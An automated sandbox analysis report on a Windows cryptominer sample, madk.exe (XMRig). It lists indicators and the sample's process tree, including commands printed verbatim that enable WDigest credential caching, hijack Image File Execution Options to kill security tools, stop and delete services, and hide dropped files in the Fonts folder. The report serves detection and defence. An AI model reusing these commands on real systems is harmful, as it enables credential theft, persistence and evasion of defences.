xmrig | 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594

Resubmissions

26-09-2022 23:59

220926-318jzsdcgn 10

21-06-2022 21:54

220621-1skf3sgcg9 10

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
21-06-2022 21:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

madk.exe
Size

3.4MB
MD5

d00af5991807952929e5b986afd295c9
SHA1

7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
SHA256

025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
SHA512

c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6

Score

10^/10

xmrig discovery evasion miner persistence ransomware upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

1252 wevtutil.exe
352 wevtutil.exe
3696 wevtutil.exe
Detected Stratum cryptominer command 2 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

rundlls.exesvchost.exe

pid process

3076 rundlls.exe
740 svchost.exe

pid	process
1252	wevtutil.exe
352	wevtutil.exe
3696	wevtutil.exe

pid	process
3076	rundlls.exe
740	svchost.exe

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig
C:\Windows\Fonts\rundlls.exe	xmrig
\??\c:\windows\Fonts\rundlls.exe	xmrig
behavioral2/memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig

Executes dropped EXE 13 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exe

pid	process
3312	svchost.exe
1548	svchost.exe
2604	svchost.exe
3104	svchost.exe
2020	svchost.exe
1108	svchost.exe
2164	conhost.exe
740	svchost.exe
2520	svchost.exe
4324	svchost.exe
1504	svchost.exe
1936	svchost.exe
3076	rundlls.exe

Sets file execution options in registry 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe"	reg.exe

Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2016 attrib.exe
4916 attrib.exe
1772 attrib.exe
3296 attrib.exe
2860 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2016	attrib.exe
4916	attrib.exe
1772	attrib.exe
3296	attrib.exe
2860	attrib.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3744-130-0x0000000000400000-0x0000000000809000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/3312-170-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1548-171-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3104-173-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2604-172-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3104-176-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2020-175-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/1108-180-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3744-182-0x0000000000400000-0x0000000000809000-memory.dmp	upx
C:\Windows\Fonts\conhost.exe	upx
\??\c:\windows\Fonts\conhost.exe	upx
behavioral2/memory/2020-187-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/740-215-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2520-216-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/4324-218-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/1936-227-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1504-228-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1504-229-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1548-231-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1108-232-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
behavioral2/memory/1936-234-0x0000000140000000-0x0000000140053000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

madk.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation madk.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exe

pid process

4572 takeown.exe
3976 takeown.exe
1044 takeown.exe
4048 takeown.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	madk.exe

pid	process
4572	takeown.exe
3976	takeown.exe
1044	takeown.exe
4048	takeown.exe

Drops file in Windows directory 64 IoCs

Processes:

madk.execonhost.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File created	\??\c:\windows\Fonts\svchost.exe	madk.exe
File opened for modification	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\lsass.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\svchost.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\WinRing0x64.sys	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe

Launches sc.exe 23 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1332	sc.exe
5000	sc.exe
2524	sc.exe
2248	sc.exe
2576	sc.exe
4616	sc.exe
3216	sc.exe
4664	sc.exe
1944	sc.exe
1964	sc.exe
4584	sc.exe
980	sc.exe
4340	sc.exe
1140	sc.exe
1956	sc.exe
5108	sc.exe
2516	sc.exe
308	sc.exe
4720	sc.exe
3264	sc.exe
2136	sc.exe
1964	sc.exe
2524	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with WMI 4 IoCs
evasion

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

4188 WMIC.exe
2340 WMIC.exe
2300 WMIC.exe
2536 WMIC.exe

pid	process
4188	WMIC.exe
2340	WMIC.exe
2300	WMIC.exe
2536	WMIC.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1744	taskkill.exe
4028	taskkill.exe
1676	taskkill.exe
1748	taskkill.exe
3156	taskkill.exe
5108	taskkill.exe
1196	taskkill.exe
4920	taskkill.exe
3964	taskkill.exe
3880	taskkill.exe
3404	taskkill.exe
2324	taskkill.exe
1340	taskkill.exe
4440	taskkill.exe

Modifies registry class 1 IoCs

Processes:

madk.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings madk.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4224 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3972 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	madk.exe

pid	process
4224	reg.exe

pid	process
3972	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exe

pid	process
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe
2164	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

636

pid	process
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4028	taskkill.exe
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	3880	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	4440	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeLockMemoryPrivilege	3076	rundlls.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: 36	2340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: 36	2340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2300	WMIC.exe
Token: SeSecurityPrivilege	2300	WMIC.exe
Token: SeTakeOwnershipPrivilege	2300	WMIC.exe
Token: SeLoadDriverPrivilege	2300	WMIC.exe
Token: SeSystemProfilePrivilege	2300	WMIC.exe
Token: SeSystemtimePrivilege	2300	WMIC.exe
Token: SeProfSingleProcessPrivilege	2300	WMIC.exe
Token: SeIncBasePriorityPrivilege	2300	WMIC.exe
Token: SeCreatePagefilePrivilege	2300	WMIC.exe
Token: SeBackupPrivilege	2300	WMIC.exe
Token: SeRestorePrivilege	2300	WMIC.exe
Token: SeShutdownPrivilege	2300	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundlls.exe

pid process

3076 rundlls.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

madk.execonhost.exe

pid process

3744 madk.exe
3744 madk.exe
2164 conhost.exe
2164 conhost.exe

pid	process
3076	rundlls.exe

pid	process
3744	madk.exe
3744	madk.exe
2164	conhost.exe
2164	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

madk.exe

description	pid	process	target process
PID 3744 wrote to memory of 4284	3744	madk.exe	cmd.exe
PID 3744 wrote to memory of 4284	3744	madk.exe	cmd.exe
PID 3744 wrote to memory of 4284	3744	madk.exe	cmd.exe
PID 3744 wrote to memory of 4224	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4224	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4224	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4268	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4268	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4268	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4184	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4184	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4184	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4768	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4768	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4768	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4172	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4172	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4172	3744	madk.exe	reg.exe
PID 3744 wrote to memory of 4664	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4664	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4664	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4720	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4720	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4720	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 3264	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 3264	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 3264	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2136	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2136	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2136	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2524	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2524	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2524	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2248	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2248	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 2248	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 1964	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 1964	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 1964	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4584	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4584	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4584	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 4028	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 4028	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 4028	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 3404	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 3404	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 3404	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 3880	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 3880	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 3880	3744	madk.exe	taskkill.exe
PID 3744 wrote to memory of 5084	3744	madk.exe	net.exe
PID 3744 wrote to memory of 5084	3744	madk.exe	net.exe
PID 3744 wrote to memory of 5084	3744	madk.exe	net.exe
PID 3744 wrote to memory of 4088	3744	madk.exe	net1.exe
PID 3744 wrote to memory of 4088	3744	madk.exe	net1.exe
PID 3744 wrote to memory of 4088	3744	madk.exe	net1.exe
PID 3744 wrote to memory of 1272	3744	madk.exe	net.exe
PID 3744 wrote to memory of 1272	3744	madk.exe	net.exe
PID 3744 wrote to memory of 1272	3744	madk.exe	net.exe
PID 3744 wrote to memory of 1944	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 1944	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 1944	3744	madk.exe	sc.exe
PID 3744 wrote to memory of 3940	3744	madk.exe	net.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
1904	attrib.exe
1524	attrib.exe
1588	attrib.exe
3728	attrib.exe
2520	attrib.exe
4648	attrib.exe
4260	attrib.exe
4988	attrib.exe
5084	attrib.exe
1628	attrib.exe
2212	attrib.exe
3992	attrib.exe
1932	attrib.exe
1140	attrib.exe
2348	attrib.exe
908	attrib.exe
656	attrib.exe
4344	attrib.exe
2056	attrib.exe
4292	attrib.exe
412	attrib.exe
1192	attrib.exe
2944	attrib.exe
1744	attrib.exe
4324	attrib.exe
304	attrib.exe
1956	attrib.exe
1772	attrib.exe
784	attrib.exe
2528	attrib.exe
4572	attrib.exe
2016	attrib.exe
4728	attrib.exe
3704	attrib.exe
4372	attrib.exe
1872	attrib.exe
1096	attrib.exe
4596	attrib.exe
4352	attrib.exe
4976	attrib.exe
2528	attrib.exe
3192	attrib.exe
2556	attrib.exe
4592	attrib.exe
2760	attrib.exe
3968	attrib.exe
4048	attrib.exe
3400	attrib.exe
2144	attrib.exe
1640	attrib.exe
3152	attrib.exe
1552	attrib.exe
4916	attrib.exe
3992	attrib.exe
2008	attrib.exe
2944	attrib.exe
2268	attrib.exe
3408	attrib.exe
3700	attrib.exe
4312	attrib.exe
1196	attrib.exe
3152	attrib.exe
4480	attrib.exe
4200	attrib.exe

C:\Users\Admin\AppData\Local\Temp\madk.exe
"C:\Users\Admin\AppData\Local\Temp\madk.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
PID:4284

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
3⤵
- Drops file in Windows directory
PID:1016

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2⤵
- Modifies registry key
PID:4224

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
2⤵
- Sets file execution options in registry
PID:4184

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
2⤵
PID:4768

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
2⤵
PID:4172

C:\Windows\SysWOW64\sc.exe
sc delete MetPipAtcivator
2⤵
- Launches sc.exe
PID:4720

C:\Windows\SysWOW64\sc.exe
sc stop SetPipAtcivator
2⤵
- Launches sc.exe
PID:3264

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMaims
2⤵
- Launches sc.exe
PID:2524

C:\Windows\SysWOW64\sc.exe
sc delete SetPipAtcivator
2⤵
- Launches sc.exe
PID:2136

C:\Windows\SysWOW64\sc.exe
sc stop MetPipAtcivator
2⤵
- Launches sc.exe
PID:4664

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMaims
2⤵
- Launches sc.exe
PID:2248

C:\Windows\SysWOW64\sc.exe
sc stop MicrosotMais
2⤵
- Launches sc.exe
PID:1964

